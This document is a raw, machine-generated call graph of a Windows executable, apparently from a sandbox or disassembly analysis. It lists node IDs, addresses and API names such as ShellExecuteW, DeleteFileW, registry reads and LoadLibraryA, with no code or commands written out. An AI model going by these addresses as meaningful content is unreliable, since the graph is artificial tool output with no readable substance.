106028->105462 106030 90faf0 106029->106030 106031 90fb27 106029->106031 106032 91015b 8 API calls 106030->106032 106041 90fe73 8 API calls 106031->106041 106034 90faf7 WideCharToMultiByte 106032->106034 106040 90fb30 8 API calls __fread_nolock 106034->106040 106036 90fb1b 106036->105467 106038 91012b 8 API calls 106037->106038 106039 8f3978 106038->106039 106039->105474 106039->105475 106040->106036 106041->106036 106043 8fae03 8 API calls 106042->106043 106044 8f70cd 106043->106044 106044->105489 106046 959760 106045->106046 106047 959752 106045->106047 106049 8f77ad 8 API calls 106046->106049 106048 8f8635 8 API calls 106047->106048 106050 95975e 106048->106050 106049->106050 106050->105501 106052 8f58eb 106051->106052 106056 8f590c __fread_nolock 106051->106056 106055 91015b 8 API calls 106052->106055 106053 91012b 8 API calls 106054 8f591f 106053->106054 106054->105501 106055->106056 106056->106053 106058 8f6ab6 106057->106058 106059 935409 106057->106059 106068 8f6ac7 106058->106068 106078 95115e 8 API calls __fread_nolock 106059->106078 106062 8f6ac2 106062->105499 106063 935413 106064 8fad69 8 API calls 106063->106064 106065 93541f 106063->106065 106064->106065 106066->105492 106067->105495 106069 8f6ad6 106068->106069 106074 8f6b0a __fread_nolock 106068->106074 106070 93543a 106069->106070 106071 8f6afd 106069->106071 106069->106074 106073 91012b 8 API calls 106070->106073 106072 8f6c63 8 API calls 106071->106072 106072->106074 106075 935449 106073->106075 106074->106062 106076 91015b 8 API calls 106075->106076 106077 93547d __fread_nolock 106076->106077 106078->106063 106081 961667 106079->106081 106092 961780 106079->106092 106080 9616b4 106083 91015b 8 API calls 106080->106083 106081->106080 106082 961687 106081->106082 106084 9616cb 106081->106084 106082->106080 106086 96169b 106082->106086 106097 9616a9 __fread_nolock 106083->106097 106085 91015b 8 API calls 106084->106085 106094 9616e8 106084->106094 106085->106094 106088 91015b 8 API calls 106086->106088 106087 96170f 106089 91015b 8 API calls 106087->106089 106088->106097 106091 961715 106089->106091 106090 91012b 8 API calls 106090->106092 106098 90c130 8 API calls 106091->106098 106092->105522 106094->106086 106094->106087 106094->106097 106095 961721 106096 90fac6 10 API calls 106095->106096 106096->106097 106097->106090 106098->106095 106100 91012b 8 API calls 106099->106100 106101 90bb1e 106100->106101 106102 8fa1d4 8 API calls 106101->106102 106103 90bb29 106102->106103 106103->105527 106105 8f39b4 ___scrt_fastfail 106104->106105 106132 8f4dd2 106105->106132 106109 8f3a3a 106110 9339c2 Shell_NotifyIconW 106109->106110 106111 8f3a58 Shell_NotifyIconW 106109->106111 106136 8f5033 106111->106136 106113 8f3a6e 106113->105537 106115 8f2f76 106114->106115 106116 8f2f26 ___scrt_fastfail 106114->106116 106115->105537 106117 8f2f45 Shell_NotifyIconW 106116->106117 106117->106115 106118->105537 106119->105537 106121 8f7477 _wcslen 106120->106121 106122 9355fc 106120->106122 106125 8f748d 106121->106125 106126 8f74b2 106121->106126 106123 8f8635 8 API calls 106122->106123 106124 935605 106123->106124 106124->106124 106128 8f7851 8 API calls 106125->106128 106127 91012b 8 API calls 106126->106127 106130 8f74be 106127->106130 106129 8f7495 __fread_nolock 106128->106129 106129->105537 106131 91015b 8 API calls 106130->106131 106131->106129 106133 8f4dee 106132->106133 106134 8f3a09 106132->106134 106133->106134 106135 9340d9 DestroyIcon 106133->106135 106134->106109 106166 95ce59 42 API calls _strftime 106134->106166 106135->106134 106137 8f5132 106136->106137 106138 8f5050 106136->106138 106137->106113 106139 8f69c4 8 API calls 106138->106139 106140 8f505e 106139->106140 106141 8f506b 106140->106141 106142 9342ad LoadStringW 106140->106142 106143 8f7467 8 API calls 106141->106143 106145 9342c7 106142->106145 106144 8f5080 106143->106144 106146 8f508d 106144->106146 106153 9342e3 106144->106153 106148 8fad69 8 API calls 106145->106148 106152 8f50b3 ___scrt_fastfail 106145->106152 106146->106145 106147 8f5097 106146->106147 106149 8f59dc 8 API calls 106147->106149 106148->106152 106150 8f50a5 106149->106150 106151 8f6aa4 8 API calls 106150->106151 106151->106152 106154 8f5118 Shell_NotifyIconW 106152->106154 106153->106152 106155 8fae03 8 API calls 106153->106155 106156 934326 106153->106156 106154->106137 106157 93430d 106155->106157 106168 90fe35 51 API calls 106156->106168 106167 95a08a 9 API calls 106157->106167 106160 934318 106161 934345 106163 8f59dc 8 API calls 106161->106163 106166->106109 106167->106160 106168->106161 106170 8fae03 8 API calls 106169->106170 106171 95d678 106170->106171 106172 8fae03 8 API calls 106171->106172 106173 95d680 106172->106173 106174 8fae03 8 API calls 106173->106174 106175 95d688 106174->106175 106255 8f3ff7 106175->106255 106178 8f3ff7 9 API calls 106179 95d69c 106178->106179 106265 95e76d 106179->106265 106213 8fae03 8 API calls 106212->106213 106214 8f3e4a 106213->106214 106215 8fae03 8 API calls 106214->106215 106216 8f3e52 106215->106216 106217 8fae03 8 API calls 106216->106217 106218 8f3e5a 106217->106218 106219 8fae03 8 API calls 106218->106219 106220 8f3e62 106219->106220 106221 8f3e96 106220->106221 106222 933b78 106220->106222 106224 8f7642 8 API calls 106221->106224 106223 8fad69 8 API calls 106222->106223 106225 933b81 106223->106225 106226 8f3ea4 106224->106226 106227 8fabe7 8 API calls 106225->106227 106228 8f8635 8 API calls 106226->106228 106232 8f3ed9 106227->106232 106229 8f3eae 106228->106229 106230 8f7642 8 API calls 106229->106230 106229->106232 106231 8f3f1e 106232->106231 106234 8f3efa 106232->106234 106250 933ba3 106232->106250 106234->106231 106242 8f7467 8 API calls 106250->106242 106332 9322a0 106255->106332 106258 8f403e 106261 8fabe7 8 API calls 106258->106261 106259 8f4023 106260 8f7467 8 API calls 106259->106260 106262 8f402f 106260->106262 106261->106262 106334 8f699d 106262->106334 106266 8fae03 8 API calls 106265->106266 106333 8f4004 GetFullPathNameW 106332->106333 106333->106258 106333->106259 106335 8f69ab 106334->106335 106336 8f8635 8 API calls 106335->106336 106337 8f403b 106336->106337 106337->106178 106346 983296 106340->106346 106343 98330f timeGetTime 106343->105576 106344 8fb81d 39 API calls 106344->106343 106347 8fa35b 8 API calls 106346->106347 106348 9832b1 106347->106348 106349 9832db 106348->106349 106350 9832bd 106348->106350 106351 8f7467 8 API calls 106349->106351 106352 8f7e30 52 API calls 106350->106352 106355 9832d9 106351->106355 106353 9832ca 106352->106353 106354 8fad69 8 API calls 106353->106354 106353->106355 106354->106355 106355->106343 106355->106344 106357 8fae03 8 API calls 106356->106357 106358 95d9ad 106357->106358 106359 8fae03 8 API calls 106358->106359 106360 95d9b6 106359->106360 106361 8fae03 8 API calls 106360->106361 106362 95d9bf 106361->106362 106363 8f3ff7 9 API calls 106362->106363 106364 95d9ca 106363->106364 106365 95e7da GetFileAttributesW 106364->106365 106366 95d9d3 106365->106366 106367 95d9e5 106366->106367 106368 8f59dc 8 API calls 106366->106368 106369 8f3e34 8 API calls 106367->106369 106368->106367 106370 95d9f9 FindFirstFileW 106369->106370 106371 95da85 FindClose 106370->106371 106372 95da18 106370->106372 106377 95da90 106371->106377 106372->106371 106375 95da1c 106372->106375 106373 95da60 FindNextFileW 106373->106372 106373->106375 106374 8fad69 8 API calls 106374->106375 106375->106372 106375->106373 106375->106374 106376 8f6aa4 8 API calls 106375->106376 106378 8f59dc 8 API calls 106375->106378 106376->106375 106377->105583 106379 95da51 DeleteFileW 106378->106379 106379->106373 106380 95da7c FindClose 106379->106380 106380->106377 106381->105594 106383 8fb5fb 106382->106383 106384 94020c 106383->106384 106389 8fb603 messages 106383->106389 106385 91012b 8 API calls 106384->106385 106387 940218 106385->106387 106386 8fb60a 106386->105599 106389->106386 106390 8fb670 106389->106390 106391 8fb67b messages 106390->106391 106392 90e1db 8 API calls 106391->106392 106393 8fb6b6 messages 106391->106393 106392->106393 106393->106389 106394->105103 106395->105110 106396->105158 106397->105097 106398->105106 106399->105130 106400->105130 106401->105130 106402->105109 106403->105118 106404->105108 106405->105108 106407 8fb249 106406->106407 106413 8fb271 messages 106406->106413 106408 8fb257 106407->106408 106409 8fb23b 8 API calls 106407->106409 106410 8fb25d 106408->106410 106411 8fb23b 8 API calls 106408->106411 106409->106408 106412 8fb670 8 API calls 106410->106412 106410->106413 106411->106410 106412->106413 106413->105125 106414->105151 106415->105151 106416->105130 106417->105151 106418->105150 106419->105130 106421 900856 106420->106421 106437 9008ce 106420->106437 106422 900863 106421->106422 106423 945ae7 106421->106423 106430 945b0b 106422->106430 106433 90086d 106422->106433 106494 978305 229 API calls 2 library calls 106423->106494 106424 945adb 106493 963d0b 81 API calls __wsopen_s 106424->106493 106428 945b3c 106431 945b47 106428->106431 106432 945b69 106428->106432 106429 8ff1e0 229 API calls 106429->106437 106430->106428 106436 945b23 106430->106436 106496 978305 229 API calls 2 library calls 106431->106496 106497 975e10 8 API calls 106432->106497 106434 8fad69 8 API calls 106433->106434 106456 900880 messages 106433->106456 106434->106456 106435 900a55 106435->105200 106495 963d0b 81 API calls __wsopen_s 106436->106495 106437->106429 106437->106435 106443 94588f 106437->106443 106455 900a49 106437->106455 106463 9458a4 messages 106437->106463 106464 900994 106437->106464 106475 900a02 messages 106437->106475 106441 945a08 106451 8fad69 8 API calls 106441->106451 106441->106456 106490 963d0b 81 API calls __wsopen_s 106443->106490 106444 945d60 106446 945d96 106444->106446 106502 977ef8 65 API calls 106444->106502 106445 945b74 106449 945c08 106445->106449 106461 945b8f 106445->106461 106452 8fa35b 8 API calls 106446->106452 106499 961802 8 API calls 106449->106499 106451->106456 106477 9008c3 messages 106452->106477 106453 945d3e 106457 8f7e30 52 API calls 106453->106457 106454 945d74 106458 8f7e30 52 API calls 106454->106458 106455->106435 106489 963d0b 81 API calls __wsopen_s 106455->106489 106456->106444 106456->106477 106501 977db9 53 API calls __wsopen_s 106456->106501 106471 945d46 _wcslen 106457->106471 106474 945d7c _wcslen 106458->106474 106498 9611b5 8 API calls 106461->106498 106462 945c1a 106467 8fab97 8 API calls 106462->106467 106463->106475 106463->106477 106491 963d0b 81 API calls __wsopen_s 106463->106491 106464->106455 106488 900b40 8 API calls 106464->106488 106470 945c23 106467->106470 106468 9009f5 106468->106455 106468->106475 106469 945bb9 106473 9019c0 229 API calls 106469->106473 106500 9611b5 8 API calls 106470->106500 106471->106444 106472 8fa35b 8 API calls 106471->106472 106472->106444 106473->106456 106474->106446 106476 8fa35b 8 API calls 106474->106476 106475->106424 106475->106441 106475->106456 106475->106477 106492 90b215 229 API calls 106475->106492 106476->106446 106477->105200 106479 945c3c 106480 8fc210 229 API calls 106479->106480 106480->106456 106481->105200 106482->105200 106483->105200 106484->105202 106485->105195 106486->105195 106487->105195 106488->106468 106489->106477 106490->106463 106491->106475 106492->106475 106493->106423 106494->106456 106495->106477 106496->106456 106497->106445 106498->106469 106499->106462 106500->106479 106501->106453 106502->106454 106508 95e543 106503->106508 106504 95e55a 106510 91664b 39 API calls 106504->106510 106507 95e560 106507->105211 106508->106504 106508->106507 106509 916702 GetStringTypeW _strftime 106508->106509 106509->106508 106510->106507 106511 9445d7 106522 90e28e 106511->106522 106513 9445ed 106515 944668 106513->106515 106531 90a921 9 API calls 106513->106531 106516 8fc210 229 API calls 106515->106516 106517 9446b4 106516->106517 106519 94515e 106517->106519 106533 963d0b 81 API calls __wsopen_s 106517->106533 106520 944648 106520->106517 106532 9621a8 8 API calls 106520->106532 106523 90e29c 106522->106523 106524 90e2af 106522->106524 106527 8fa35b 8 API calls 106523->106527 106525 90e2e2 106524->106525 106526 90e2b4 106524->106526 106529 8fa35b 8 API calls 106525->106529 106528 91012b 8 API calls 106526->106528 106530 90e2a6 106527->106530 106528->106530 106529->106530 106530->106513 106531->106520 106532->106515 106533->106519 106534 943fd7 106538 9617a9 106534->106538 106536 943fe2 106537 9617a9 52 API calls 106536->106537 106537->106536 106543 9617b6 106538->106543 106548 9617e3 106538->106548 106539 9617e5 106550 90fd37 52 API calls 106539->106550 106540 9617ea 106542 8f7e30 52 API calls 106540->106542 106544 9617f1 106542->106544 106543->106539 106543->106540 106546 9617dd 106543->106546 106543->106548 106545 8f6aa4 8 API calls 106544->106545 106545->106548 106549 8fb3b0 39 API calls 106546->106549 106548->106536 106549->106548 106550->106540 106551 942dd0 106577 8fdd50 messages 106551->106577 106552 8fe0b1 PeekMessageW 106552->106577 106553 8fdda7 GetInputState 106553->106552 106553->106577 106554 942254 TranslateAcceleratorW 106554->106577 106555 90f3b7 2 API calls 106555->106577 106556 8fe12f PeekMessageW 106556->106577 106557 8fe113 TranslateMessage DispatchMessageW 106557->106556 106558 8fdfa4 timeGetTime 106558->106577 106559 8fe14f Sleep 106559->106577 106560 94310a Sleep 106571 942fe7 106560->106571 106563 942370 timeGetTime 106584 90a921 9 API calls 106563->106584 106565 95dac1 46 API calls 106565->106571 106566 9431a1 GetExitCodeProcess 106567 9431b7 WaitForSingleObject 106566->106567 106568 9431cd CloseHandle 106566->106568 106567->106568 106567->106577 106568->106571 106569 98317d GetForegroundWindow 106569->106571 106571->106565 106571->106566 106571->106569 106572 8fdf75 106571->106572 106573 94323f Sleep 106571->106573 106571->106577 106588 90ef0e timeGetTime 106571->106588 106573->106577 106574 8fe2f0 229 API calls 106574->106577 106575 95efbc 5 API calls 106575->106577 106576 8fe570 229 API calls 106576->106577 106577->106552 106577->106553 106577->106554 106577->106555 106577->106556 106577->106557 106577->106558 106577->106559 106577->106560 106577->106563 106577->106571 106577->106572 106577->106574 106577->106575 106577->106576 106579 8ff1e0 229 API calls 106577->106579 106580 9019c0 229 API calls 106577->106580 106581 8fc210 229 API calls 106577->106581 106583 90ef0e timeGetTime 106577->106583 106585 964199 8 API calls 106577->106585 106586 963d0b 81 API calls __wsopen_s 106577->106586 106587 975ddf 8 API calls 106577->106587 106579->106577 106580->106577 106581->106577 106583->106577 106584->106577 106585->106577 106586->106577 106587->106577 106588->106571 106589 90fa95 106590 90fac0 106589->106590 106591 90fa9f 106589->106591 106597 94faf6 106590->106597 106598 955443 8 API calls messages 106590->106598 106592 8fb23b 8 API calls 106591->106592 106594 90faaf 106592->106594 106595 8fb23b 8 API calls 106594->106595 106596 90fabf 106595->106596 106598->106590 106599 8f31c8 106600 8f31d5 __wsopen_s 106599->106600 106601 8f31ee 106600->106601 106602 933330 ___scrt_fastfail 106600->106602 106603 8f3ff7 9 API calls 106601->106603 106604 93334c GetOpenFileNameW 106602->106604 106605 8f31f7 106603->106605 106606 93339b 106604->106606 106615 8f318a 106605->106615 106608 8f7467 8 API calls 106606->106608 106610 9333b0 106608->106610 106610->106610 106612 8f320c 106633 8f515f 106612->106633 106616 9322a0 __wsopen_s 106615->106616 106617 8f3197 GetLongPathNameW 106616->106617 106618 8f7467 8 API calls 106617->106618 106619 8f31bf 106618->106619 106620 8f3c2f 106619->106620 106621 8fae03 8 API calls 106620->106621 106622 8f3c41 106621->106622 106623 8f3ff7 9 API calls 106622->106623 106624 8f3c4c 106623->106624 106625 8f3c57 106624->106625 106629 933b44 106624->106629 106626 8f58dc 8 API calls 106625->106626 106628 8f3c63 106626->106628 106627 90e224 41 API calls 106627->106629 106662 8f12f4 106628->106662 106629->106627 106631 933b66 106629->106631 106632 8f3c76 106632->106612 106668 8f54de 106633->106668 106663 8f1306 106662->106663 106667 8f1325 __fread_nolock 106662->106667 106665 91015b 8 API calls 106663->106665 106664 91012b 8 API calls 106666 8f133c 106664->106666 106665->106667 106666->106632 106667->106664 106811 8f54a3 LoadLibraryA 106668->106811 106673 934660 106676 8f554c 68 API calls 106673->106676 106674 8f5509 LoadLibraryExW 106819 8f546c LoadLibraryA 106674->106819 106678 934667 106676->106678 106680 8f546c 3 API calls 106678->106680 106681 93466f 106680->106681 106840 8f56aa 106681->106840 106812 8f54bb GetProcAddress 106811->106812 106813 8f54d9 106811->106813 106814 8f54cb 106812->106814 106816 91e93b 106813->106816 106814->106813 106815 8f54d2 FreeLibrary 106814->106815 106815->106813 106846 91e87a 106816->106846 106818 8f54fd 106818->106673 106818->106674 106820 8f5481 GetProcAddress 106819->106820 106821 8f54a0 106819->106821 106822 8f5491 106820->106822 106824 8f5580 106821->106824 106822->106821 106823 8f5499 FreeLibrary 106822->106823 106823->106821 106825 91015b 8 API calls 106824->106825 106826 8f5595 106825->106826 106827 8f3966 8 API calls 106826->106827 106828 8f55a1 __fread_nolock 106827->106828 106829 9346da 106828->106829 106833 8f55dc 106828->106833 106919 963738 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 106828->106919 106841 8f56bc 106840->106841 106842 934778 106840->106842 106987 91ec14 106841->106987 106849 91e886 BuildCatchObjectHelperInternal 106846->106849 106847 91e894 106871 922b68 20 API calls __dosmaperr 106847->106871 106849->106847 106851 91e8c4 106849->106851 106850 91e899 106872 922aac 26 API calls ___std_exception_copy 106850->106872 106853 91e8d6 106851->106853 106854 91e8c9 106851->106854 106863 9283b1 106853->106863 106873 922b68 20 API calls __dosmaperr 106854->106873 106857 91e8df 106862 91e8a4 __wsopen_s 106862->106818 106864 9283bd BuildCatchObjectHelperInternal 106863->106864 106876 9232ae EnterCriticalSection 106864->106876 106866 9283cb 106877 92844b 106866->106877 106870 9283fc __wsopen_s 106870->106857 106871->106850 106872->106862 106873->106862 106876->106866 106884 92846e 106877->106884 106878 9284c7 106895 924fcd 106878->106895 106884->106878 106884->106884 106889 9283d8 106884->106889 106893 9194dd EnterCriticalSection 106884->106893 106894 9194f1 LeaveCriticalSection 106884->106894 106890 928407 106889->106890 106913 9232f6 LeaveCriticalSection 106890->106913 106892 92840e 106892->106870 106893->106884 106894->106884 106900 924fda BuildCatchObjectHelperInternal 106895->106900 106896 92501a 106911 922b68 20 API calls __dosmaperr 106896->106911 106897 925005 RtlAllocateHeap 106898 925018 106897->106898 106897->106900 106902 922d18 106898->106902 106900->106896 106900->106897 106910 9151fd 7 API calls 2 library calls 106900->106910 106910->106900 106911->106898 106913->106892 106919->106829 106990 91ec31 106987->106990 107402 9454dc 107403 91012b 8 API calls 107402->107403 107404 9454e3 107403->107404 107405 91015b 8 API calls 107404->107405 107408 9454fc __fread_nolock 107404->107408 107405->107408 107406 91015b 8 API calls 107407 945521 107406->107407 107408->107406 107409 8f1044 107414 8f2c6f 107409->107414 107451 8f4045 107414->107451 107418 8f2ce6 107419 8fae03 8 API calls 107418->107419 107420 8f2cf0 107419->107420 107421 8fae03 8 API calls 107420->107421 107422 8f2cfa 107421->107422 107423 8fae03 8 API calls 107422->107423 107424 8f2d04 107423->107424 107425 8fae03 8 API calls 107424->107425 107426 8f2d42 107425->107426 107427 8fae03 8 API calls 107426->107427 107428 8f2e0e 107427->107428 107461 8f540c 107428->107461 107497 8f409e 107451->107497 107454 8f409e 8 API calls 107455 8f407d 107454->107455 107456 8fae03 8 API calls 107455->107456 107457 8f4089 107456->107457 107458 8f7467 8 API calls 107457->107458 107459 8f2ca5 107458->107459 107460 8f2a8d 6 API calls 107459->107460 107460->107418 107462 8fae03 8 API calls 107461->107462 107463 8f541c 107462->107463 107464 8fae03 8 API calls 107463->107464 107465 8f5424 107464->107465 107466 8f70c5 8 API calls 107465->107466 107467 8f542c 107466->107467 107468 8f70c5 8 API calls 107467->107468 107469 8f5434 107468->107469 107470 8fae03 8 API calls 107469->107470 107471 8f543f 107470->107471 107472 91012b 8 API calls 107471->107472 107473 8f2e18 107472->107473 107474 8f2af5 107473->107474 107475 8f2b03 107474->107475 107476 8fae03 8 API calls 107475->107476 107477 8f2b0e 107476->107477 107498 8fae03 8 API calls 107497->107498 107499 8f40a9 107498->107499 107500 8fae03 8 API calls 107499->107500 107501 8f40b1 107500->107501 107502 8fae03 8 API calls 107501->107502 107503 8f4073 107502->107503 107503->107454 107506 932f58 107507 932f62 107506->107507 107508 8f280d 107506->107508 107538 8f3dd1 107507->107538 107534 8f286b 7 API calls 107508->107534 107512 932f6b 107514 8fa1d4 8 API calls 107512->107514 107516 932f79 107514->107516 107515 8f2817 107520 8f3989 60 API calls 107515->107520 107526 8f282c 107515->107526 107517 932f81 107516->107517 107518 932fa8 107516->107518 107519 8f59dc 8 API calls 107517->107519 107521 8f59dc 8 API calls 107518->107521 107522 932f8c 107519->107522 107520->107526 107523 932fa4 GetForegroundWindow ShellExecuteW 107521->107523 107524 8f6aa4 8 API calls 107522->107524 107530 932fd9 107523->107530 107528 932f9a 107524->107528 107525 8f2847 107532 8f284e SetCurrentDirectoryW 107525->107532 107526->107525 107529 8f2f14 Shell_NotifyIconW 107526->107529 107531 8f59dc 8 API calls 107528->107531 107529->107525 107530->107525 107531->107523 107533 8f2862 107532->107533 107545 8f29bc 7 API calls 107534->107545 107536 8f2812 107537 8f294b CreateWindowExW CreateWindowExW ShowWindow ShowWindow 107536->107537 107537->107515 107539 9322a0 __wsopen_s 107538->107539 107540 8f3dde GetModuleFileNameW 107539->107540 107541 8fa1d4 8 API calls 107540->107541 107542 8f3e04 107541->107542 107543 8f3ff7 9 API calls 107542->107543 107544 8f3e0e 107543->107544 107544->107512 107545->107536 107546 8ffd5f 107547 8ffd73 107546->107547 107552 9002c5 107546->107552 107548 8ffd85 107547->107548 107549 91012b 8 API calls 107547->107549 107550 9445b3 107548->107550 107551 8fa35b 8 API calls 107548->107551 107553 8ffdde 107548->107553 107549->107548 107584 96183e 8 API calls 107550->107584 107551->107548 107552->107548 107556 8fad69 8 API calls 107552->107556 107554 9019c0 229 API calls 107553->107554 107572 8ff33d messages 107553->107572 107575 8ff216 messages 107554->107575 107556->107548 107557 9452b2 107588 963d0b 81 API calls __wsopen_s 107557->107588 107558 91012b 8 API calls 107558->107575 107559 900535 107566 8fad69 8 API calls 107559->107566 107559->107572 107562 944c62 107569 8fad69 8 API calls 107562->107569 107562->107572 107563 9451e1 107587 963d0b 81 API calls __wsopen_s 107563->107587 107566->107572 107567 910592 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 107567->107575 107568 8fad69 8 API calls 107568->107575 107569->107572 107570 900830 229 API calls 107570->107575 107571 8fae03 8 API calls 107571->107575 107573 9103f3 29 API calls pre_c_initialization 107573->107575 107575->107557 107575->107558 107575->107559 107575->107562 107575->107563 107575->107567 107575->107568 107575->107570 107575->107571 107575->107572 107575->107573 107576 94509c 107575->107576 107579 8ff94e messages 107575->107579 107580 910548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 107575->107580 107581 900cf0 40 API calls messages 107575->107581 107582 977db9 53 API calls __wsopen_s 107575->107582 107583 977ef8 65 API calls 107575->107583 107585 963d0b 81 API calls __wsopen_s 107576->107585 107586 963d0b 81 API calls __wsopen_s 107579->107586 107580->107575 107581->107575 107582->107575 107583->107575 107584->107572 107585->107579 107586->107572 107587->107572 107588->107572 107589 8f105b 107594 8f3ae4 107589->107594 107591 8f106a 107625 9103f3 29 API calls __onexit 107591->107625 107593 8f1074 107595 8f3af4 __wsopen_s 107594->107595 107596 8fae03 8 API calls 107595->107596 107597 8f3baa 107596->107597 107598 8f3dd1 10 API calls 107597->107598 107599 8f3bb3 107598->107599 107626 8f3a75 107599->107626 107602 8f59dc 8 API calls 107603 8f3bcc 107602->107603 107604 8f58dc 8 API calls 107603->107604 107605 8f3bdb 107604->107605 107606 8fae03 8 API calls 107605->107606 107607 8f3be4 107606->107607 107608 8fabe7 8 API calls 107607->107608 107609 8f3bed RegOpenKeyExW 107608->107609 107610 9339cf RegQueryValueExW 107609->107610 107614 8f3c0f 107609->107614 107611 933a65 RegCloseKey 107610->107611 107612 9339ec 107610->107612 107611->107614 107617 933a77 _wcslen 107611->107617 107613 91015b 8 API calls 107612->107613 107615 933a05 107613->107615 107614->107591 107616 8f3966 8 API calls 107615->107616 107618 933a10 RegQueryValueExW 107616->107618 107617->107614 107622 8f53e8 8 API calls 107617->107622 107623 8fa1d4 8 API calls 107617->107623 107624 8f58dc 8 API calls 107617->107624 107619 933a47 messages 107618->107619 107620 933a2d 107618->107620 107619->107611 107621 8f7467 8 API calls 107620->107621 107621->107619 107622->107617 107623->107617 107624->107617 107625->107593 107627 9322a0 __wsopen_s 107626->107627 107628 8f3a82 GetFullPathNameW 107627->107628 107629 8f3aa4 107628->107629 107630 8f7467 8 API calls 107629->107630 107631 8f3ac2 107630->107631 107631->107602 107632 8f1098 107637 8f4e68 107632->107637 107636 8f10a7 107638 8fae03 8 API calls 107637->107638 107639 8f4e7f GetVersionExW 107638->107639 107640 8f7467 8 API calls 107639->107640 107641 8f4ecc 107640->107641 107642 8f8635 8 API calls 107641->107642 107649 8f4f02 107641->107649 107643 8f4ef6 107642->107643 107644 8f699d 8 API calls 107643->107644 107644->107649 107645 8f4fa6 GetCurrentProcess IsWow64Process 107646 8f4fc2 107645->107646 107647 8f4fda LoadLibraryA 107646->107647 107648 93429e GetSystemInfo 107646->107648 107651 8f4feb GetProcAddress 107647->107651 107652 8f5027 GetSystemInfo 107647->107652 107649->107645 107650 934259 107649->107650 107651->107652 107654 8f4ffb GetNativeSystemInfo 107651->107654 107653 8f5001 107652->107653 107655 8f109d 107653->107655 107656 8f5005 FreeLibrary 107653->107656 107654->107653 107657 9103f3 29 API calls __onexit 107655->107657 107656->107655 107657->107636 107658 91074b 107659 910757 BuildCatchObjectHelperInternal 107658->107659 107687 910201 107659->107687 107661 91075e 107662 9108b1 107661->107662 107665 910788 107661->107665 107717 910b8f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 107662->107717 107664 9108b8 107710 9151a2 107664->107710 107675 9107c7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 107665->107675 107698 92273d 107665->107698 107672 9107a7 107674 910828 107706 910ca9 107674->107706 107675->107674 107713 91516a 38 API calls 3 library calls 107675->107713 107678 91082e 107679 910843 107678->107679 107714 910ce2 GetModuleHandleW 107679->107714 107681 91084a 107681->107664 107682 91084e 107681->107682 107683 910857 107682->107683 107715 915145 28 API calls _abort 107682->107715 107716 910390 13 API calls 2 library calls 107683->107716 107686 91085f 107686->107672 107688 91020a 107687->107688 107719 9109e8 IsProcessorFeaturePresent 107688->107719 107690 910216 107720 912fe4 10 API calls 3 library calls 107690->107720 107692 91021b 107697 91021f 107692->107697 107721 9225d7 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 107692->107721 107694 910236 107694->107661 107695 910228 107695->107694 107722 91300d 8 API calls 3 library calls 107695->107722 107697->107661 107699 922754 107698->107699 107723 910ddc 107699->107723 107701 9107a1 107701->107672 107702 9226e1 107701->107702 107705 922710 107702->107705 107703 910ddc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 107704 922739 107703->107704 107704->107675 107705->107703 107731 912690 107706->107731 107709 910ccf 107709->107678 107733 914f1f 107710->107733 107713->107674 107714->107681 107715->107683 107716->107686 107717->107664 107719->107690 107720->107692 107721->107695 107722->107697 107724 910de5 107723->107724 107725 910de7 IsProcessorFeaturePresent 107723->107725 107724->107701 107727 910fad 107725->107727 107730 910f71 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 107727->107730 107729 911090 107729->107701 107730->107729 107732 910cbc GetStartupInfoW 107731->107732 107732->107709 107734 914f2b BuildCatchObjectHelperInternal 107733->107734 107735 914f32 107734->107735 107736 914f44 107734->107736 107772 915079 GetModuleHandleW 107735->107772 107757 9232ae EnterCriticalSection 107736->107757 107739 914f37 107739->107736 107773 9150bd GetModuleHandleExW 107739->107773 107740 914fe9 107761 915029 107740->107761 107744 914fc0 107749 914fd8 107744->107749 107754 9226e1 _abort 5 API calls 107744->107754 107746 914f4b 107746->107740 107746->107744 107758 922468 107746->107758 107747 915032 107781 932079 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 107747->107781 107748 915006 107764 915038 107748->107764 107750 9226e1 _abort 5 API calls 107749->107750 107750->107740 107754->107749 107757->107746 107782 9221a1 107758->107782 107801 9232f6 LeaveCriticalSection 107761->107801 107763 915002 107763->107747 107763->107748 107802 92395c 107764->107802 107767 915066 107769 9150bd _abort 8 API calls 107767->107769 107768 915046 GetPEB 107768->107767 107770 915056 GetCurrentProcess TerminateProcess 107768->107770 107771 91506e ExitProcess 107769->107771 107770->107767 107772->107739 107774 9150e7 GetProcAddress 107773->107774 107775 91510a 107773->107775 107776 9150fc 107774->107776 107777 915110 FreeLibrary 107775->107777 107778 915119 107775->107778 107776->107775 107777->107778 107779 910ddc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 107778->107779 107780 914f43 107779->107780 107780->107736 107785 922150 107782->107785 107784 9221c5 107784->107744 107786 92215c BuildCatchObjectHelperInternal 107785->107786 107793 9232ae EnterCriticalSection 107786->107793 107788 92216a 107794 9221f1 107788->107794 107792 922188 __wsopen_s 107792->107784 107793->107788 107797 922219 107794->107797 107798 922211 107794->107798 107795 910ddc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 107796 922177 107795->107796 107800 922195 LeaveCriticalSection _abort 107796->107800 107797->107798 107799 922d18 _free 20 API calls 107797->107799 107798->107795 107799->107798 107800->107792 107801->107763 107803 923981 107802->107803 107804 923977 107802->107804 107809 923327 5 API calls 2 library calls 107803->107809 107806 910ddc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 107804->107806 107807 915042 107806->107807 107807->107767 107807->107768 107808 923998 107808->107804 107809->107808 107810 91f04e 107811 91f05a BuildCatchObjectHelperInternal 107810->107811 107812 91f066 107811->107812 107813 91f07b 107811->107813 107829 922b68 20 API calls __dosmaperr 107812->107829 107823 9194dd EnterCriticalSection 107813->107823 107816 91f06b 107830 922aac 26 API calls ___std_exception_copy 107816->107830 107817 91f087 107824 91f0bb 107817->107824 107822 91f076 __wsopen_s 107823->107817 107832 91f0e6 